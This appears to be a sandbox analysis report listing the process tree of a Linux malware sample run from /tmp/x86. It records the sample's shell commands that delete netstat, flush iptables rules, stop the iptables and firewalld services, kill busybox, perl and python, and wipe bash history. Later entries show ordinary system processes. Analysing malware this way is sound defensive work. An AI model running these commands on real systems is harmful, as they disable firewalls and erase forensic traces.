                              Analysis Process: x86 PID: 5269 Parent PID: 5255

                              General

                              Start time:03:03:47
                              Start date:11/11/2021
                              Path:/tmp/x86
                              Arguments:n/a
                              File size:42980 bytes
                              MD5 hash:776097f22f49b5f4c467e2afdee63009

                              Analysis Process: sh PID: 5269 Parent PID: 5255

                              General

                              Start time:03:03:47
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:sh -c "rm -rf /bin/netstat"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: sh PID: 5270 Parent PID: 5269

                              General

                              Start time:03:03:47
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:n/a
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: rm PID: 5270 Parent PID: 5269

                              General

                              Start time:03:03:47
                              Start date:11/11/2021
                              Path:/usr/bin/rm
                              Arguments:rm -rf /bin/netstat
                              File size:72056 bytes
                              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                              Analysis Process: x86 PID: 5271 Parent PID: 5255

                              General

                              Start time:03:03:47
                              Start date:11/11/2021
                              Path:/tmp/x86
                              Arguments:n/a
                              File size:42980 bytes
                              MD5 hash:776097f22f49b5f4c467e2afdee63009

                              Analysis Process: sh PID: 5271 Parent PID: 5255

                              General

                              Start time:03:03:47
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:sh -c "iptables -F"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: sh PID: 5272 Parent PID: 5271

                              General

                              Start time:03:03:47
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:n/a
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: iptables PID: 5272 Parent PID: 5271

                              General

                              Start time:03:03:47
                              Start date:11/11/2021
                              Path:/usr/sbin/iptables
                              Arguments:iptables -F
                              File size:99296 bytes
                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                              Analysis Process: x86 PID: 5276 Parent PID: 5255

                              General

                              Start time:03:03:47
                              Start date:11/11/2021
                              Path:/tmp/x86
                              Arguments:n/a
                              File size:42980 bytes
                              MD5 hash:776097f22f49b5f4c467e2afdee63009

                              Analysis Process: sh PID: 5276 Parent PID: 5255

                              General

                              Start time:03:03:47
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:sh -c "pkill -9 busybox"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: sh PID: 5278 Parent PID: 5276

                              General

                              Start time:03:03:47
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:n/a
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: pkill PID: 5278 Parent PID: 5276

                              General

                              Start time:03:03:47
                              Start date:11/11/2021
                              Path:/usr/bin/pkill
                              Arguments:pkill -9 busybox
                              File size:30968 bytes
                              MD5 hash:fa96a75a08109d8842e4865b2907d51f

                              Analysis Process: x86 PID: 5283 Parent PID: 5255

                              General

                              Start time:03:03:49
                              Start date:11/11/2021
                              Path:/tmp/x86
                              Arguments:n/a
                              File size:42980 bytes
                              MD5 hash:776097f22f49b5f4c467e2afdee63009

                              Analysis Process: sh PID: 5283 Parent PID: 5255

                              General

                              Start time:03:03:49
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:sh -c "pkill -9 perl"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: sh PID: 5284 Parent PID: 5283

                              General

                              Start time:03:03:49
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:n/a
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: pkill PID: 5284 Parent PID: 5283

                              General

                              Start time:03:03:49
                              Start date:11/11/2021
                              Path:/usr/bin/pkill
                              Arguments:pkill -9 perl
                              File size:30968 bytes
                              MD5 hash:fa96a75a08109d8842e4865b2907d51f

                              Analysis Process: x86 PID: 5285 Parent PID: 5255

                              General

                              Start time:03:03:53
                              Start date:11/11/2021
                              Path:/tmp/x86
                              Arguments:n/a
                              File size:42980 bytes
                              MD5 hash:776097f22f49b5f4c467e2afdee63009

                              Analysis Process: sh PID: 5285 Parent PID: 5255

                              General

                              Start time:03:03:53
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:sh -c "pkill -9 python"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: sh PID: 5286 Parent PID: 5285

                              General

                              Start time:03:03:53
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:n/a
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: pkill PID: 5286 Parent PID: 5285

                              General

                              Start time:03:03:53
                              Start date:11/11/2021
                              Path:/usr/bin/pkill
                              Arguments:pkill -9 python
                              File size:30968 bytes
                              MD5 hash:fa96a75a08109d8842e4865b2907d51f

                              Analysis Process: x86 PID: 5289 Parent PID: 5255

                              General

                              Start time:03:03:55
                              Start date:11/11/2021
                              Path:/tmp/x86
                              Arguments:n/a
                              File size:42980 bytes
                              MD5 hash:776097f22f49b5f4c467e2afdee63009

                              Analysis Process: sh PID: 5289 Parent PID: 5255

                              General

                              Start time:03:03:55
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:sh -c "service iptables stop"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: sh PID: 5290 Parent PID: 5289

                              General

                              Start time:03:03:55
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:n/a
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: service PID: 5290 Parent PID: 5289

                              General

                              Start time:03:03:56
                              Start date:11/11/2021
                              Path:/usr/sbin/service
                              Arguments:service iptables stop
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: service PID: 5292 Parent PID: 5290

                              General

                              Start time:03:03:56
                              Start date:11/11/2021
                              Path:/usr/sbin/service
                              Arguments:n/a
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: basename PID: 5292 Parent PID: 5290

                              General

                              Start time:03:03:56
                              Start date:11/11/2021
                              Path:/usr/bin/basename
                              Arguments:basename /usr/sbin/service
                              File size:39256 bytes
                              MD5 hash:3283660e59f128df18bec9b96fbd4d41

                              Analysis Process: service PID: 5293 Parent PID: 5290

                              General

                              Start time:03:03:56
                              Start date:11/11/2021
                              Path:/usr/sbin/service
                              Arguments:n/a
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: basename PID: 5293 Parent PID: 5290

                              General

                              Start time:03:03:56
                              Start date:11/11/2021
                              Path:/usr/bin/basename
                              Arguments:basename /usr/sbin/service
                              File size:39256 bytes
                              MD5 hash:3283660e59f128df18bec9b96fbd4d41

                              Analysis Process: service PID: 5294 Parent PID: 5290

                              General

                              Start time:03:03:56
                              Start date:11/11/2021
                              Path:/usr/sbin/service
                              Arguments:n/a
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: systemctl PID: 5294 Parent PID: 5290

                              General

                              Start time:03:03:56
                              Start date:11/11/2021
                              Path:/usr/bin/systemctl
                              Arguments:systemctl --quiet is-active multi-user.target
                              File size:996584 bytes
                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                              Analysis Process: service PID: 5295 Parent PID: 5290

                              General

                              Start time:03:03:56
                              Start date:11/11/2021
                              Path:/usr/sbin/service
                              Arguments:n/a
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: service PID: 5296 Parent PID: 5295

                              General

                              Start time:03:03:56
                              Start date:11/11/2021
                              Path:/usr/sbin/service
                              Arguments:n/a
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: systemctl PID: 5296 Parent PID: 5295

                              General

                              Start time:03:03:56
                              Start date:11/11/2021
                              Path:/usr/bin/systemctl
                              Arguments:systemctl list-unit-files --full --type=socket
                              File size:996584 bytes
                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                              Analysis Process: service PID: 5297 Parent PID: 5295

                              General

                              Start time:03:03:56
                              Start date:11/11/2021
                              Path:/usr/sbin/service
                              Arguments:n/a
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: sed PID: 5297 Parent PID: 5295

                              General

                              Start time:03:03:56
                              Start date:11/11/2021
                              Path:/usr/bin/sed
                              Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                              File size:121288 bytes
                              MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                              Analysis Process: systemctl PID: 5290 Parent PID: 5289

                              General

                              Start time:03:03:59
                              Start date:11/11/2021
                              Path:/usr/bin/systemctl
                              Arguments:systemctl stop iptables.service
                              File size:996584 bytes
                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                              Analysis Process: x86 PID: 5300 Parent PID: 5255

                              General

                              Start time:03:03:59
                              Start date:11/11/2021
                              Path:/tmp/x86
                              Arguments:n/a
                              File size:42980 bytes
                              MD5 hash:776097f22f49b5f4c467e2afdee63009

                              Analysis Process: sh PID: 5300 Parent PID: 5255

                              General

                              Start time:03:03:59
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:sh -c "/sbin/iptables -F; /sbin/iptables -X"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: sh PID: 5301 Parent PID: 5300

                              General

                              Start time:03:03:59
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:n/a
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: iptables PID: 5301 Parent PID: 5300

                              General

                              Start time:03:03:59
                              Start date:11/11/2021
                              Path:/sbin/iptables
                              Arguments:/sbin/iptables -F
                              File size:99296 bytes
                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                              Analysis Process: sh PID: 5302 Parent PID: 5300

                              General

                              Start time:03:03:59
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:n/a
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: iptables PID: 5302 Parent PID: 5300

                              General

                              Start time:03:03:59
                              Start date:11/11/2021
                              Path:/sbin/iptables
                              Arguments:/sbin/iptables -X
                              File size:99296 bytes
                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                              Analysis Process: x86 PID: 5303 Parent PID: 5255

                              General

                              Start time:03:03:59
                              Start date:11/11/2021
                              Path:/tmp/x86
                              Arguments:n/a
                              File size:42980 bytes
                              MD5 hash:776097f22f49b5f4c467e2afdee63009

                              Analysis Process: sh PID: 5303 Parent PID: 5255

                              General

                              Start time:03:03:59
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:sh -c "service firewalld stop"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: sh PID: 5304 Parent PID: 5303

                              General

                              Start time:03:04:00
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:n/a
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: service PID: 5304 Parent PID: 5303

                              General

                              Start time:03:04:00
                              Start date:11/11/2021
                              Path:/usr/sbin/service
                              Arguments:service firewalld stop
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: service PID: 5305 Parent PID: 5304

                              General

                              Start time:03:04:00
                              Start date:11/11/2021
                              Path:/usr/sbin/service
                              Arguments:n/a
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: basename PID: 5305 Parent PID: 5304

                              General

                              Start time:03:04:00
                              Start date:11/11/2021
                              Path:/usr/bin/basename
                              Arguments:basename /usr/sbin/service
                              File size:39256 bytes
                              MD5 hash:3283660e59f128df18bec9b96fbd4d41

                              Analysis Process: service PID: 5306 Parent PID: 5304

                              General

                              Start time:03:04:00
                              Start date:11/11/2021
                              Path:/usr/sbin/service
                              Arguments:n/a
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: basename PID: 5306 Parent PID: 5304

                              General

                              Start time:03:04:00
                              Start date:11/11/2021
                              Path:/usr/bin/basename
                              Arguments:basename /usr/sbin/service
                              File size:39256 bytes
                              MD5 hash:3283660e59f128df18bec9b96fbd4d41

                              Analysis Process: service PID: 5307 Parent PID: 5304

                              General

                              Start time:03:04:00
                              Start date:11/11/2021
                              Path:/usr/sbin/service
                              Arguments:n/a
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: systemctl PID: 5307 Parent PID: 5304

                              General

                              Start time:03:04:00
                              Start date:11/11/2021
                              Path:/usr/bin/systemctl
                              Arguments:systemctl --quiet is-active multi-user.target
                              File size:996584 bytes
                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                              Analysis Process: service PID: 5308 Parent PID: 5304

                              General

                              Start time:03:04:00
                              Start date:11/11/2021
                              Path:/usr/sbin/service
                              Arguments:n/a
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: service PID: 5309 Parent PID: 5308

                              General

                              Start time:03:04:00
                              Start date:11/11/2021
                              Path:/usr/sbin/service
                              Arguments:n/a
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: systemctl PID: 5309 Parent PID: 5308

                              General

                              Start time:03:04:00
                              Start date:11/11/2021
                              Path:/usr/bin/systemctl
                              Arguments:systemctl list-unit-files --full --type=socket
                              File size:996584 bytes
                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                              Analysis Process: service PID: 5310 Parent PID: 5308

                              General

                              Start time:03:04:00
                              Start date:11/11/2021
                              Path:/usr/sbin/service
                              Arguments:n/a
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: sed PID: 5310 Parent PID: 5308

                              General

                              Start time:03:04:00
                              Start date:11/11/2021
                              Path:/usr/bin/sed
                              Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                              File size:121288 bytes
                              MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                              Analysis Process: systemctl PID: 5304 Parent PID: 5303

                              General

                              Start time:03:04:02
                              Start date:11/11/2021
                              Path:/usr/bin/systemctl
                              Arguments:systemctl stop firewalld.service
                              File size:996584 bytes
                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                              Analysis Process: x86 PID: 5311 Parent PID: 5255

                              General

                              Start time:03:04:03
                              Start date:11/11/2021
                              Path:/tmp/x86
                              Arguments:n/a
                              File size:42980 bytes
                              MD5 hash:776097f22f49b5f4c467e2afdee63009

                              Analysis Process: sh PID: 5311 Parent PID: 5255

                              General

                              Start time:03:04:03
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:sh -c "rm -rf ~/.bash_history"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: sh PID: 5312 Parent PID: 5311

                              General

                              Start time:03:04:03
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:n/a
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: rm PID: 5312 Parent PID: 5311

                              General

                              Start time:03:04:03
                              Start date:11/11/2021
                              Path:/usr/bin/rm
                              Arguments:rm -rf /root/.bash_history
                              File size:72056 bytes
                              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                              Analysis Process: x86 PID: 5313 Parent PID: 5255

                              General

                              Start time:03:04:03
                              Start date:11/11/2021
                              Path:/tmp/x86
                              Arguments:n/a
                              File size:42980 bytes
                              MD5 hash:776097f22f49b5f4c467e2afdee63009

                              Analysis Process: sh PID: 5313 Parent PID: 5255

                              General

                              Start time:03:04:03
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:sh -c "history -c"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: systemd PID: 5337 Parent PID: 1

                              General

                              Start time:03:04:21
                              Start date:11/11/2021
                              Path:/usr/lib/systemd/systemd
                              Arguments:n/a
                              File size:1620224 bytes
                              MD5 hash:9b2bec7092a40488108543f9334aab75

                              Analysis Process: whoopsie PID: 5337 Parent PID: 1

                              General

                              Start time:03:04:21
                              Start date:11/11/2021
                              Path:/usr/bin/whoopsie
                              Arguments:/usr/bin/whoopsie -f
                              File size:68592 bytes
                              MD5 hash:d3a6915d0e7398fb4c89a037c13959c8

                              Analysis Process: systemd PID: 5367 Parent PID: 1

                              General

                              Start time:03:04:25
                              Start date:11/11/2021
                              Path:/usr/lib/systemd/systemd
                              Arguments:n/a
                              File size:1620224 bytes
                              MD5 hash:9b2bec7092a40488108543f9334aab75

                              Analysis Process: sshd PID: 5367 Parent PID: 1

                              General

                              Start time:03:04:25
                              Start date:11/11/2021
                              Path:/usr/sbin/sshd
                              Arguments:/usr/sbin/sshd -t
                              File size:876328 bytes
                              MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                              Analysis Process: systemd PID: 5368 Parent PID: 1

                              General

                              Start time:03:04:25
                              Start date:11/11/2021
                              Path:/usr/lib/systemd/systemd
                              Arguments:n/a
                              File size:1620224 bytes
                              MD5 hash:9b2bec7092a40488108543f9334aab75

                              Analysis Process: sshd PID: 5368 Parent PID: 1

                              General

                              Start time:03:04:25
                              Start date:11/11/2021
                              Path:/usr/sbin/sshd
                              Arguments:/usr/sbin/sshd -D
                              File size:876328 bytes
                              MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                              Analysis Process: gdm3 PID: 5371 Parent PID: 1320

                              General

                              Start time:03:04:32
                              Start date:11/11/2021
                              Path:/usr/sbin/gdm3
                              Arguments:n/a
                              File size:453296 bytes
                              MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                              Analysis Process: Default PID: 5371 Parent PID: 1320

                              General

                              Start time:03:04:32
                              Start date:11/11/2021
                              Path:/etc/gdm3/PrimeOff/Default
                              Arguments:/etc/gdm3/PrimeOff/Default
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: gdm3 PID: 5372 Parent PID: 1320

                              General

                              Start time:03:04:32
                              Start date:11/11/2021
                              Path:/usr/sbin/gdm3
                              Arguments:n/a
                              File size:453296 bytes
                              MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                              Analysis Process: Default PID: 5372 Parent PID: 1320

                              General

                              Start time:03:04:32
                              Start date:11/11/2021
                              Path:/etc/gdm3/PrimeOff/Default
                              Arguments:/etc/gdm3/PrimeOff/Default
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: systemd PID: 5375 Parent PID: 1

                              General

                              Start time:03:04:32
                              Start date:11/11/2021
                              Path:/usr/lib/systemd/systemd
                              Arguments:n/a
                              File size:1620224 bytes
                              MD5 hash:9b2bec7092a40488108543f9334aab75

                              Analysis Process: accounts-daemon PID: 5375 Parent PID: 1

                              General

                              Start time:03:04:32
                              Start date:11/11/2021
                              Path:/usr/lib/accountsservice/accounts-daemon
                              Arguments:/usr/lib/accountsservice/accounts-daemon
                              File size:203192 bytes
                              MD5 hash:01a899e3fb5e7e434bea1290255a1f30

                              Analysis Process: systemd PID: 5410 Parent PID: 1860

                              General

                              Start time:03:04:53
                              Start date:11/11/2021
                              Path:/usr/lib/systemd/systemd
                              Arguments:n/a
                              File size:1620224 bytes
                              MD5 hash:9b2bec7092a40488108543f9334aab75

                              Analysis Process: pulseaudio PID: 5410 Parent PID: 1860

                              General

                              Start time:03:04:53
                              Start date:11/11/2021
                              Path:/usr/bin/pulseaudio
                              Arguments:/usr/bin/pulseaudio --daemonize=no --log-target=journal
                              File size:100832 bytes
                              MD5 hash:0c3b4c789d8ffb12b25507f27e14c186

                              Analysis Process: systemd PID: 5435 Parent PID: 1

                              General

                              Start time:03:04:58
                              Start date:11/11/2021
                              Path:/usr/lib/systemd/systemd
                              Arguments:n/a
                              File size:1620224 bytes
                              MD5 hash:9b2bec7092a40488108543f9334aab75

                              Analysis Process: gpu-manager PID: 5435 Parent PID: 1

                              General

                              Start time:03:04:58
                              Start date:11/11/2021
                              Path:/usr/bin/gpu-manager
                              Arguments:/usr/bin/gpu-manager --log /var/log/gpu-manager.log
                              File size:76616 bytes
                              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                              Analysis Process: gpu-manager PID: 5436 Parent PID: 5435

                              General

                              Start time:03:04:58
                              Start date:11/11/2021
                              Path:/usr/bin/gpu-manager
                              Arguments:n/a
                              File size:76616 bytes
                              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                              Analysis Process: sh PID: 5436 Parent PID: 5435

                              General

                              Start time:03:04:58
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: sh PID: 5437 Parent PID: 5436

                              General

                              Start time:03:04:58
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:n/a
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: grep PID: 5437 Parent PID: 5436

                              General

                              Start time:03:04:58
                              Start date:11/11/2021
                              Path:/usr/bin/grep
                              Arguments:grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
                              File size:199136 bytes
                              MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                              Analysis Process: gpu-manager PID: 5438 Parent PID: 5435

                              General

                              Start time:03:04:58
                              Start date:11/11/2021
                              Path:/usr/bin/gpu-manager
                              Arguments:n/a
                              File size:76616 bytes
                              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                              Analysis Process: sh PID: 5438 Parent PID: 5435

                              General

                              Start time:03:04:58
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: sh PID: 5439 Parent PID: 5438

                              General

                              Start time:03:04:58
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:n/a
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: grep PID: 5439 Parent PID: 5438

                              General

                              Start time:03:04:58
                              Start date:11/11/2021
                              Path:/usr/bin/grep
                              Arguments:grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
                              File size:199136 bytes
                              MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                              Analysis Process: gpu-manager PID: 5440 Parent PID: 5435

                              General

                              Start time:03:04:58
                              Start date:11/11/2021
                              Path:/usr/bin/gpu-manager
                              Arguments:n/a
                              File size:76616 bytes
                              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                              Analysis Process: sh PID: 5440 Parent PID: 5435

                              General

                              Start time:03:04:58
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: sh PID: 5441 Parent PID: 5440

                              General

                              Start time:03:04:58
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:n/a
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: grep PID: 5441 Parent PID: 5440

                              General

                              Start time:03:04:58
                              Start date:11/11/2021
                              Path:/usr/bin/grep
                              Arguments:grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
                              File size:199136 bytes
                              MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                              Analysis Process: gpu-manager PID: 5442 Parent PID: 5435

                              General

                              Start time:03:04:58
                              Start date:11/11/2021
                              Path:/usr/bin/gpu-manager
                              Arguments:n/a
                              File size:76616 bytes
                              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                              Analysis Process: sh PID: 5442 Parent PID: 5435

                              General

                              Start time:03:04:58
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: sh PID: 5443 Parent PID: 5442

                              General

                              Start time:03:04:58
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:n/a
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: grep PID: 5443 Parent PID: 5442

                              General

                              Start time:03:04:58
                              Start date:11/11/2021
                              Path:/usr/bin/grep
                              Arguments:grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
                              File size:199136 bytes
                              MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                              Analysis Process: gpu-manager PID: 5444 Parent PID: 5435

                              General

                              Start time:03:04:58
                              Start date:11/11/2021
                              Path:/usr/bin/gpu-manager
                              Arguments:n/a
                              File size:76616 bytes
                              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                              Analysis Process: sh PID: 5444 Parent PID: 5435

                              General

                              Start time:03:04:58
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: sh PID: 5445 Parent PID: 5444

                              General

                              Start time:03:04:58
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:n/a
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: grep PID: 5445 Parent PID: 5444

                              General

                              Start time:03:04:58
                              Start date:11/11/2021
                              Path:/usr/bin/grep
                              Arguments:grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
                              File size:199136 bytes
                              MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                              Analysis Process: gpu-manager PID: 5446 Parent PID: 5435

                              General

                              Start time:03:04:58
                              Start date:11/11/2021
                              Path:/usr/bin/gpu-manager
                              Arguments:n/a
                              File size:76616 bytes
                              MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                              Analysis Process: sh PID: 5446 Parent PID: 5435

                              General

                              Start time:03:04:58
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Analysis Process: sh PID: 5447 Parent PID: 5446

                              General

                              Start time:03:04:58
                              Start date:11/11/2021
                              Path:/bin/sh
                              Arguments:n/a
                              File size:129816 bytes
